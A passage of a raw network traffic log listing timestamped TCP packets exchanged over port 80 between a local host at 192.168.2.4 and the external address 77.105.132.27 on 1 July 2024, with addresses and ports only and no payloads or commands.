Jul 1, 2024 09:16:13.631792068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.631814003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.633038044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.633668900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.633683920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.633716106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.633858919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.634934902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.634954929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.634967089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.634994030 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.635049105 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.636159897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.636173964 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.636213064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.637428999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.637440920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.637466908 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.637492895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.638619900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.638633966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.638669968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.639695883 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.639709949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.639741898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.639779091 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.640929937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.640948057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.640958071 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.640986919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.641012907 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.641911983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.641925097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.642009974 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.643055916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.643071890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.643100977 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.643119097 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.644133091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.644146919 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.644155979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.644187927 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.645174980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.645188093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.645198107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.645210981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.645239115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.646236897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.646250010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.646294117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.647138119 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.647150993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.647176981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.647202969 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.648133039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.648144960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.648154974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.648183107 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.648207903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.649130106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.649147034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.649194956 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.650043011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.650053978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.650063992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.650094032 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.650110006 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.650979996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.650990963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.651031971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.651895046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.651911974 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.651921988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.651938915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.652764082 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.652780056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.652851105 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.652863026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.652863026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.653640032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.653654099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.653713942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.653713942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.654567003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.654581070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.654619932 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.655369043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.655381918 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.655409098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.655424118 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.656157970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.656176090 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.656215906 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.656657934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.656670094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.656707048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.657506943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.657519102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.657542944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.657561064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.658317089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.658329010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.658366919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.659148932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.659162045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.659185886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.659204006 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.660011053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.660023928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.660033941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.660048962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.660074949 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.660814047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.660830975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.660893917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.660893917 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.661581993 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.661598921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.661638021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.662404060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.662419081 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.662457943 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.663284063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.663297892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.663309097 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.663321972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.663346052 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.663965940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.663979053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.664001942 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.664019108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.665000916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.665014029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.665050030 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.665066004 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.665600061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.665613890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.665648937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.666146994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.666161060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.666171074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.666194916 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.666215897 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.666796923 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.666809082 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.666820049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.666834116 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.666851997 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.666876078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.667957067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.667970896 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.667983055 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.668000937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.668023109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.668857098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.668869972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.668879986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.668894053 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.668899059 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.668920040 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.668936968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.669871092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.669886112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.669897079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.669924021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.669939041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.670869112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.670882940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.670893908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.670927048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.670943975 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.671911001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.671925068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.671936035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.671948910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.671966076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.671994925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.672985077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.673024893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.673218012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.673229933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.673253059 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.673273087 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.682501078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.682514906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.682570934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.683026075 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.683038950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.683074951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.684036970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.684050083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.684078932 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.684094906 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.684703112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.684719086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.684753895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.684771061 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.685214996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.685230970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.685240984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.685250998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.685261965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.685273886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.685323954 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.686047077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686059952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686069965 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686081886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686091900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686131954 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.686131954 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.686131954 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.686945915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686959028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686969042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686980963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.686997890 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.687031031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.687674999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.687688112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.687697887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.687707901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.687719107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.687728882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.687730074 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.687743902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.687779903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.688580036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.688592911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.688604116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.688615084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.688618898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.688626051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.688637018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.688642025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.688679934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.689472914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.689486027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.689496994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.689507961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.689513922 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.689518929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.689531088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.689552069 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.689569950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.690056086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690069914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690109968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690121889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690133095 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690135002 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.690145969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690155983 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.690157890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690167904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.690185070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.690202951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.691080093 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691095114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691104889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691117048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691128969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691138029 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.691139936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691147089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.691152096 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691164017 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691174030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.691180944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.691200018 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.691216946 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.692044020 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692056894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692068100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692080021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692084074 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.692090034 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692105055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.692109108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692121983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692131996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692133904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.692143917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.692147970 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.692167044 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.692192078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.693106890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693120003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693130970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693141937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693152905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693159103 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.693165064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693178892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693192005 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693193913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.693203926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693209887 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.693227053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.693253994 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.693975925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.693989992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694000959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694011927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694021940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694029093 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.694032907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694041967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694052935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694056034 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.694063902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694075108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694077969 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.694107056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.694900036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694912910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694924116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694935083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694946051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694948912 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.694957972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.694972992 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.694992065 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.695552111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.695564032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.695574999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.695585966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.695595980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.695599079 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.695607901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.695617914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:13.695622921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:13.695630074 CEST	80	49752	77.105.132.27	192.168.2.4
